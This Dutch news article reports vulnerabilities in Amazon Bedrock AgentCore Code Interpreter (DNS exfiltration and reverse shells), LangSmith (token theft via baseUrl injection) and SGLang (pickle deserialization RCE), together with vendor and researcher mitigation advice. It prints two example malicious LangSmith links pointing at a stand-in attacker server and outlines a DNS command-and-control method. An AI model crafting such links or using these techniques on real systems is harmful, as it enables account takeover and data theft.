AI-fouten in Amazon Bedrock, LangSmith en SGLang maken gegevensexfiltratie en RCE mogelijk

Cyberbeveiliging
AI-fouten in Amazon Bedrock, LangSmith en SGLang maken gegevensexfiltratie en RCE mogelijk

Cybersecurity-onderzoekers hebben details onthuld van een nieuwe methode voor het exfiltreren van gevoelige gegevens uit omgevingen voor het uitvoeren van kunstmatige intelligentie (AI)-code met behulp van DNS-query’s (Domain Name System).

In een maandag gepubliceerd rapport onthulde BeyondTrust dat de sandbox-modus van Amazon Bedrock AgentCore Code Interpreter uitgaande DNS-query’s toestaat die een aanvaller kan misbruiken om interactieve shells mogelijk te maken en netwerkisolatie te omzeilen. Het probleem, dat geen CVE-identificator heeft, heeft een CVSS-score van 7,5 uit 10,0.

Amazon Bedrock AgentCore Code Interpreter is een volledig beheerde service waarmee AI-agents code veilig kunnen uitvoeren in geïsoleerde sandbox-omgevingen, zodat agentische workloads geen toegang hebben tot externe systemen. Het werd in augustus 2025 door Amazon gelanceerd.

Het feit dat de service DNS-query’s toestaat ondanks de configuratie “geen netwerktoegang”, kan “bedreigingsactoren in staat stellen om in bepaalde scenario’s command-and-control-kanalen en data-exfiltratie via DNS op te zetten, waarbij de verwachte netwerkisolatiecontroles worden omzeild”, zegt Kinnaird McQuade, hoofdbeveiligingsarchitect bij BeyondTrust.

In een experimenteel aanvalsscenario kan een bedreigingsacteur dit gedrag misbruiken om een ​​bidirectioneel communicatiekanaal op te zetten met behulp van DNS-query’s en -antwoorden, een interactieve reverse shell te verkrijgen, gevoelige informatie te exfiltreren via DNS-query’s als zijn of haar IAM-rol toestemming heeft om toegang te krijgen tot AWS-bronnen zoals S3-buckets waarin die gegevens worden opgeslagen, en om opdrachtuitvoering uit te voeren.

Bovendien kan het DNS-communicatiemechanisme worden misbruikt om extra payloads te leveren die naar de Code Interpreter worden gevoerd, waardoor deze de DNS command-and-control (C2)-server opvraagt ​​voor opdrachten die zijn opgeslagen in DNS A-records, deze uitvoert en de resultaten retourneert via DNS-subdomeinquery’s.

Het is vermeldenswaard dat Code Interpreter een IAM-rol vereist om toegang te krijgen tot AWS-bronnen. Een simpele vergissing kan er echter voor zorgen dat er een rol met te veel bevoegdheden aan de service wordt toegewezen, waardoor deze ruime machtigingen krijgt voor toegang tot gevoelige gegevens.

“Dit onderzoek laat zien hoe DNS-resolutie de netwerkisolatiegaranties van codetolken in een sandbox kan ondermijnen”, aldus BeyondTrust. “Door deze methode te gebruiken, hadden aanvallers gevoelige gegevens kunnen stelen uit AWS-bronnen die toegankelijk zijn via de IAM-rol van de Code Interpreter, wat mogelijk downtime, datalekken van gevoelige klantinformatie of verwijderde infrastructuur zou kunnen veroorzaken.”

Na een verantwoorde openbaarmaking in september 2025 heeft Amazon vastgesteld dat het om de beoogde functionaliteit gaat en niet om een ​​defect, waarbij klanten worden aangespoord de VPC-modus te gebruiken in plaats van de sandbox-modus voor volledige netwerkisolatie. De technologiegigant beveelt ook het gebruik van een DNS-firewall aan om uitgaand DNS-verkeer te filteren.

“Om gevoelige werklasten te beschermen, moeten beheerders alle actieve AgentCore Code Interpreter-instanties inventariseren en degenen die kritieke gegevens verwerken onmiddellijk migreren van de Sandbox-modus naar de VPC-modus”, zegt Jason Soroko, senior fellow bij Sectigo.

“Werken binnen een VPC biedt de noodzakelijke infrastructuur voor robuuste netwerkisolatie, waardoor teams strikte beveiligingsgroepen, netwerk-ACL’s en Route53 Resolver DNS Firewalls kunnen implementeren om ongeautoriseerde DNS-resolutie te monitoren en te blokkeren. Ten slotte moeten beveiligingsteams de IAM-rollen die aan deze tolken zijn gekoppeld, rigoureus controleren, waarbij ze het principe van minste privileges strikt handhaven om de explosieradius van elk potentieel compromis te beperken.”

LangSmith gevoelig voor fouten bij accountovername

De onthulling komt op het moment dat Miggo Security een zeer ernstig beveiligingslek in LangSmith (CVE-2026-25750, CVSS-score: 8,5) aan het licht bracht, waardoor gebruikers werden blootgesteld aan mogelijke tokendiefstal en accountovername. Het probleem, dat van invloed is op zowel zelfgehoste als cloud-implementaties, is verholpen in LangSmith versie 0.12.71, uitgebracht in december 2025.

De tekortkoming wordt gekarakteriseerd als een geval van URL-parameterinjectie als gevolg van een gebrek aan validatie van de baseUrl-parameter, waardoor een aanvaller de dragertoken, de gebruikers-ID en de werkruimte-ID van een ingelogde gebruiker kan stelen die naar een server onder hun controle worden verzonden via social engineering-technieken, zoals het misleiden van het slachtoffer om op een speciaal vervaardigde link te klikken, zoals hieronder –

  • Wolk – smith.langchain(.)com/studio/?baseUrl=https://attacker-server.com
  • Zelf gehost – /studio/?baseUrl=https://attacker-server.com

Succesvol misbruik van het beveiligingslek kan een aanvaller in staat stellen ongeautoriseerde toegang te krijgen tot de traceergeschiedenis van de AI, en interne SQL-query’s, CRM-klantrecords of bedrijfseigen broncode bloot te leggen door toolaanroepen te beoordelen.

“Een ingelogde LangSmith-gebruiker kan in gevaar worden gebracht door alleen maar toegang te krijgen tot een door een aanvaller gecontroleerde site of door op een kwaadaardige link te klikken”, aldus Miggo-onderzoekers Liad Eliyahu en Eliana Vuijsje.

“Deze kwetsbaarheid herinnert ons eraan dat AI-observatieplatforms nu een cruciale infrastructuur zijn. Omdat deze tools prioriteit geven aan de flexibiliteit van ontwikkelaars, omzeilen ze vaak onbedoeld de beveiligingsrails. Dit risico wordt nog vergroot omdat AI-agenten, net als ‘traditionele’ software, diepgaande toegang hebben tot interne gegevensbronnen en diensten van derden.”

Onveilige deserialisatiefouten in augurken in SGLang

Er zijn ook beveiligingskwetsbaarheden gesignaleerd in SGLang, een populair open source-framework voor het bedienen van grote taalmodellen en multimodale AI-modellen, die, als ze succesvol worden uitgebuit, kunnen leiden tot onveilige deserialisatie van pickle, wat mogelijk kan leiden tot uitvoering van code op afstand.

De kwetsbaarheden, ontdekt door Orca-beveiligingsonderzoeker Igor Stepansky, zijn op het moment van schrijven nog steeds niet verholpen. Een korte beschrijving van de gebreken is als volgt:

  • CVE-2026-3059 (CVSS-score: 9,8) – Een niet-geverifieerde kwetsbaarheid voor het uitvoeren van externe code via de ZeroMQ-broker (ook bekend als ZMQ), die niet-vertrouwde gegevens deserialiseert met behulp van pickle.loads() zonder authenticatie. Het beïnvloedt de multimodale opwekkingsmodule van SGLang.
  • CVE-2026-3060 (CVSS-score: 9,8) – Een niet-geverifieerde kwetsbaarheid voor het uitvoeren van externe code via de desaggregatiemodule, die niet-vertrouwde gegevens deserialiseert met behulp van pickle.loads() zonder authenticatie. Het beïnvloedt het parallelle disaggregatiesysteem van SGLang.
  • CVE-2026-3989 (CVSS-score: 7,8) – Het gebruik van een onveilige pickle.load()-functie zonder validatie en juiste deserialisatie in SGLang’s “replay_request_dump.py”, die kan worden uitgebuit door een kwaadaardig pickle-bestand aan te bieden.

“De eerste twee maken het mogelijk om niet-geverifieerde code op afstand uit te voeren tegen elke SGLang-implementatie die de multimodale generatie- of disaggregatiefuncties aan het netwerk blootstelt”, aldus Stepansky. “De derde betreft onveilige deserialisatie in een hulpprogramma voor het opnieuw afspelen van crashdumps.”

In een gecoördineerd advies zei het CERT Coördinatiecentrum (CERT/CC) dat SGLang kwetsbaar is voor CVE-2026-3059 wanneer het multimodale opwekkingssysteem is ingeschakeld, en voor CVE-2026-3060 wanneer het parallelle desaggregatiesysteem van de encoder is ingeschakeld.

“Als aan een van beide voorwaarden is voldaan en een aanvaller de TCP-poort kent waarop de ZMQ-makelaar luistert en verzoeken naar de server kan sturen, kunnen ze de kwetsbaarheid misbruiken door een kwaadaardig pickle-bestand naar de makelaar te sturen, die het vervolgens zal deserialiseren”, aldus CERT/CC.

Gebruikers van SGLang wordt aangeraden de toegang tot de service-interfaces te beperken en ervoor te zorgen dat ze niet worden blootgesteld aan niet-vertrouwde netwerken. Het wordt ook geadviseerd om adequate netwerksegmentatie en toegangscontroles te implementeren om ongeautoriseerde interactie met de ZeroMQ-eindpunten te voorkomen.

Hoewel er geen bewijs is dat deze kwetsbaarheden in het wild zijn misbruikt, is het van cruciaal belang om te controleren op onverwachte inkomende TCP-verbindingen met de ZeroMQ-brokerpoort, onverwachte onderliggende processen voortgebracht door het SGLang Python-proces, het maken van bestanden op ongebruikelijke locaties door het SGLang-proces en uitgaande verbindingen van het SGLang-proces naar onverwachte bestemmingen.

Thijs Van der Does

Thijs Van der Does

De hoofdredacteur van Techidee.nl is Thijs Van der Does. Thijs begon als een eenvoudige technologie-enthousiast, die altijd op de hoogte was van het laatste nieuws en zijn ontdekkingen deelde met zijn vrienden.

LeakNet Ransomware gebruikt ClickFix via gehackte sites en implementeert Deno In-Memory Loader

Konni implementeert EndRAT via phishing en gebruikt KakaoTalk om malware te verspreiden

Neem contact met ons op

U kunt ons bereiken op onze bedrijfslocatie aan de Hoofdstraat 123, 4567 JH Amsterdam, of bel ons op 0318-1234567. We kijken ernaar uit van u te horen!

[email protected]